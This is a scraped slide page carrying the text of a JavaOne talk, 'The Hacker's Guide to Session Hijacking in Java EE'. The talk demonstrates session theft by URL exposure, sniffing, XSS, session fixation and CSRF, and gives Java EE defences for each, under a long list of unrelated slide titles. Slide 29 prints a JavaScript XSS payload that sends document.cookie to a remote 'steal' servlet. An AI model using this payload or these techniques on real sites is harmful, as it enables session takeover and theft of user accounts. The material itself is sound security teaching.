COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxUdaiappa Ramachandran
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 

Recently uploaded (20)

VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptx
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 

The Hacker's Guide To Session Hijacking

  • 1. The  Hacker’s  Guide     to  Session  Hijacking     in  Java  EE Patrycja  Wegrzynowicz   CTO,  Yonita,  Inc.   JavaOne  2016
  • 2. About  Me • 15+  professional  experience     • SoRware  engineer,  architect,  head  of   soRware  R&D     • Author  and  speaker     • JavaOne,  Devoxx,  JavaZone,  TheServerSide   Java  Symposium,  Jazoon,  OOPSLA,  ASE,   others     • Top  10  Women  in  Tech  2016  in  Poland   • Founder  and  CTO  of  Yonita   • Automated  detecZon  and  refactoring  of   soRware  defects   • Trainings  and  code  reviews   • Security,  performance,  concurrency,   databases     • Twi[er  @yonlabs  
  • 3. About  Me • 15+  professional  experience     • SoRware  engineer,  architect,  head  of  soRware   R&D     • Author  and  speaker     • JavaOne,  Devoxx,  JavaZone,  TheServerSide   Java  Symposium,  Jazoon,  OOPSLA,  ASE,  others     • Top  10  Women  in  Tech  2016  in  Poland   • Founder  and  CTO  of  Yonita   • Bridge  the  gap  between  the  industry  and  the   academia   • Automated  detecZon  and  refactoring  of   soRware  defects   • Trainings  and  code  reviews   • Security,  performance,  concurrency,  databases     • Twi[er  @yonlabs  
  • 4. Agenda • HTTP,  session,  OWASP   • 4  demos  to  hijack  a  session   • Best  pracZces  in  Java  EE
  • 9. What  is  Web  Session? • Session  idenZfies  interacZons  with  one  user   • Unique  idenZfier  associated  with  every  request   • Cookie   • Header   • Parameter   • Hidden  field
  • 10. OWASP  Top  10  Risks
  • 12. Session  Hijacking • Session  theR   • URL,  sniffing,  logs,  XSS  
  • 13. Session  Hijacking • Session  theR   • URL,  sniffing,  logs,  XSS     • Session  fixaZon
  • 14. Session  Hijacking • Session  theR   • URL,  sniffing,  logs,  XSS   • Session  fixaZon   • Session  predicZon  
  • 15. Demo:  Session  Exposed  in  URL • I  will  log  into  the  sample  applicaZon   • I  will  post  a  link  with  my  session  id  on  Twi[er     • @yonlabs   • Hijack  my  session  :)
  • 16. How  to  Avoid  Session  Id  in  URL? • Default:  allows  cookies  and  URL  rewriZng     • Default  cookie,  fall  back  on  URL  rewriZng   • To  embrace  all  users   • Disabled  cookies  in  a  browser   • Disable  URL  rewriZng  in  an  app  server   • App  server  specific   • Tracking  mode   • Java  EE  6,  web.xml
  • 17. web.xml <!-­‐-­‐  Java  EE  6,  Servlet  3.0  -­‐-­‐>   <session-­‐config>          <tracking-­‐mode>COOKIE</tracking-­‐mode>   </session-­‐config>  
  • 18. Session  Sniffing • How  to  find  out  a  cookie?   • e.g.,  network  monitoring  and  packet  sniffing   • How  to  use  a  cookie?   • Browsers’  plugins  and  add-­‐ons  (e.g.,  Cookie  Manager  for  Firefox)   • IntercepZng  proxy  (e.g.,  OWASP  ZAP)   • DIY:  write  your  own  code
  • 19. Demo:  Session  Sniffing • You  will  log  into  the  sample  applicaZon   • Any  non  empty  user  name   • Please,  use  meaningful  names!   • I  will  monitor  network  traffic   • tcpdump   • I  will  hijack  one  of  your  sessions   • Cookie  Manager
  • 20. How  to  Avoid  Session   Exposure  During  Transport?
  • 21. How  to  Avoid  Session  Exposure   During  Transport? Encrypt!  Use  HTTPS.
  • 22. web.xml <security-­‐constraint>   <user-­‐data-­‐constraint>   <transport-­‐guarantee>   CONFIDENTIAL   </transport-­‐guarantee>   </user-­‐data-­‐constraint>   </security-­‐constraint>
  • 23. web.xml <!-­‐-­‐  Java  EE  6,  Servlet  3.0  -­‐-­‐>   <session-­‐config>          <cookie-­‐config>                        <secure>true</secure>          </cookie-­‐config>          <tracking-­‐mode>COOKIE</tracking-­‐mode>   </session-­‐config>  
  • 24. Session  Exposure • Transport   • Unencrypted  transport   • Client-­‐side   • XSS   • A[acks  on  browsers/OS   • Server-­‐side   • Logs   • Session  replicaZon   • Memory  dump
  • 25. How  to  Steal  a  Session  if   Secure  Transport  Is  Used?
  • 26. How  to  Steal  a  Session  if  Secure   Transport  Is  Used? A3ack  a  client!
  • 27. Demo:  Session  Grabbed  by  XSS • JavaScript  code  to  steal  a  cookie   • Servlet  to  log  down  stolen  cookies   • Vulnerable  applicaZon  to  be  exploited  via  injected   JavaScript  code  (XSS)
  • 28. Demo:  Session  Grabbed  by  XSS • I  will  store  malicious  JavaScript  code  in  the  app   • Through  wriZng  an  “opinion”     • Log  into  the  vulnerable  applicaZon   • h[ps://demo.yonita.com:8181/session-­‐xss/     • Any  non  empty  user  name   • Please,  use  meaningful  names!   • Click  ‚View  others  opinions’  page   • Wait  unZl  I  will  hijack  your  session  :)
  • 29. JavaScript  to  Steal  a  Cookie <script>   <!-­‐-­‐  hacker’s  service  -­‐-­‐>   theR  =  ’h[p://demo.yonita.com/steal/steal?cookie=’   <!-­‐-­‐  to  bypass  Same  Origin  Policy  -­‐-­‐>   image  =  new  Image();   image.src  =  theR  +  document.cookie;     </script>  
  • 30. web.xml <!-­‐-­‐  Java  EE  6,  Servlet  3.0  -­‐-­‐>   <session-­‐config>          <cookie-­‐config>                        <h[p-­‐only>true</h[p-­‐only>                        <secure>true</secure>        </cookie-­‐config>          <tracking-­‐mode>COOKIE</tracking-­‐mode>   </session-­‐config>  
  • 31. Session  FixaZon • Session  fixaZon  a[ack  uZlizes  a  session  creaZon
  • 32. When  Session  is  Created? A. On  storing  an  a[ribute  in  a  session  for  the  first  Zme   B. On  calling  request.getSession(true)  /()  for  the  first   Zme   C. On  a  successful  login   D. None  of  the  above
  • 33. When  Session  is  Created? A. On  storing  an  a[ribute  in  a  session  for  the  first  Zme   B. On  calling  request.getSession(true)/()  for  the  first   Zme   C. On  a  successful  login   D. None  of  the  above
  • 34. When  Session  is  Created? A. On  storing  an  a[ribute  in  a  session  for  the  first  Zme   B. On  calling  request.getSession(true)/()  for  the  first   Zme   • H[pServletRequest::getSession(true)   • H[pServletRequest::getSession()   • an  implicit  session  object  on  JSP  pages   • unless  <%@  page  session="false"  %>   C. On  a  successful  login   D. None  of  the  above
  • 35. Session  FixaZon:  Scenario  1 • Hacker  opens  a  web  page  of  a  system  in  a  browser     • JSP  page:  a  new  session  iniZalized!   • Hacker  writes  down  the  session  id     • Hacker  leaves  the  browser  open     • User  comes  and  logs  into  the  app   • Uses  the  session  iniZalized  by  the  hacker     • Hacker  uses  the  wri[en  down  session  id  to  hijack  the   user’s  session  
  • 36. Session  FixaZon:  Scenario  2 • Hacker  opens  a  web  page  of  a  system  in  a  browser     • JSP  page:  a  new  session  iniZalized!   • Hacker  prepares  a  link  with  the  session  id  in  URL   • Hacker  tricks  a  user  to  click  the  link   • e.g.  sends  an  email  with  the  link   • User  clicks  the  link   • Uses  the  session  iniZalized  by  the  hacker     • Hacker  uses  the  wri[en  down  session  id  to  hijack  the   user’s  session  
  • 37. Session  FixaZon:  SoluZon • Change  the  session  ID  aRer  a  successful  login   • more  generally:  escalaZon  of  privileges
  • 38. Servlet  3.0/3.1  Spec • Containers  may  create  HTTP  Session  objects  to  track   login  state.  If  a  developer  creates  a  session  while  a   user  is  not  authenZcated,  and  the  container  then   authenZcates  the  user,  the  session  visible  to   developer  code  a=er  login  must  be  the  same  session   object  that  was  created  prior  to  login  occurring  so   that  there  is  no  loss  of  session  informaZon.
  • 39. Session  FixaZon:  SoluZon  in   Java  EE • Change  the  session  ID  aRer  a  successful  login   • more  generally:  escalaZon  of  privileges   • Java  EE  7  (Servlet  3.1)   • H[pServletRequest.changeSessionId()   • Java  EE  6   • H[pSession.invalidate()   • H[pServletRequest.getSession(true)
  • 40. Secure  Session  Management   Best  PracZces • Random,  unpredictable  session  id   • At  least  16  characters   • Secure  transport  and  storage  of  session  id   • Cookie  preferred  over  URL  rewriZng     • Cookie  flags:  secure,  h[pOnly     • Don’t  use  too  broad  cookie  paths     • Consistent  use  of  HTTPS   • Don’t  mix  HTTP  and  HTTPS  under  the  same  
 domain/cookie  path  
  • 41. Consistent  Use  of  HTTPS   Typical  Errors • StaZc  content  served  as  HTTP  from  the  same  domain   name   • Pre-­‐authenZcated  pages  as  HTTP,  post-­‐authenZcated   pages  as  HTTPS  from  the  same  domain  name   • Login  form  as  HTTPS,  the  rest  as  HTTP   • GMail  for  a  few  years  aRer  its  launch!
  • 42. Secure  AuthenZcaZon     Best  PracZces • Session  creaZon  and  destrucZon     • New  session  id  aRer  login     • Logout  bu[on     • Session  Zmeouts:  2”-­‐5”  for  criZcal  apps,  15”-­‐30”  for  
 typical  apps     • DetecZng  session  anomalies   • Basic  heurisZc:  a  session  associated  with  the  headers  of  the  first  request     • The  fingerprint  of  a  first  reques:  IP,  User-­‐Agent,…   • If  they  don’t  match,  something’s  going  on  (invalidate!)     • OWASP  ModSecurity  Web  ApplicaZon  Firewall   • Rules  for  detecZng  common  security  a[acks
  • 43. Secure  AuthenZcaZon     Best  PracZces  cont. • Java  EE   • DeclaraZve  authenZcaZon  implemented  using  descriptors   • ProgrammaZc  authenZcaZon   • AnnotaZons,  H[pServletRequest:  authenZcate,  login,  logout     • Advanced  flows  and  requirements   • Custom  implementaZon     • Servlet  3.0  vs  3.1   • the  session  visible  to  developer  code  a=er  login  must  be  the  same  session  object  that  was   created  prior  to  login   • Session  fixaZon  problem   • 3.0:  no  way  to  change  a  session  id!   • 3.1:  changeSessionId   • Check  out  the  container  implementaZons   • Java  EE  6  vs.  Java  EE  7
  • 44. Secure  AuthenZcaZon     Best  PracZces  cont. • My  choice   • DeclaraZve  authenZcaZon  with  Java  EE  7   • Check  out  your  applicaZon  server  behavior!   • ProgrammaZc  authenZcaZon  with  Java  EE  6  or  when  advanced  flow   need  in  Java  EE  7   • H[pServletRequest:  authenZcate,  login,  logout   • Custom  implementaZon
  • 45. What  If  We  Can’t  Steal  a   Cookie?
  • 46. What  If  We  Can’t  Steal  a   Cookie? We  can  sDll  use  it!
  • 47. Demo:  CSRF  to  Use  a  Cookie • I  will  log  into  the  applicaZon   • Log  into  the  applicaZon   • h[ps://demo.yonita.com:8181/session-­‐csrf/   • Any  non  empty  user  name     • Please,  use  meaningful  names!   • Click  the  link  and  the  bu[on  ‘Click  me’   • h[ps://demo.yonita.com:8181/a[ack-­‐csrf/   • I  will  check  my  account  balance  :)
  • 48. CSRF:  SoluZon • Use  a  unique  token  for  each  request   • anZ-­‐CSRF  token   • Remember  about  your  web  forms  and  REST  services   • POST  requests   • Other  HTTP  acZons  as  needed   • Web  framework  dependent
  • 50. A  fool  with  a  tool  is  only  a  fool!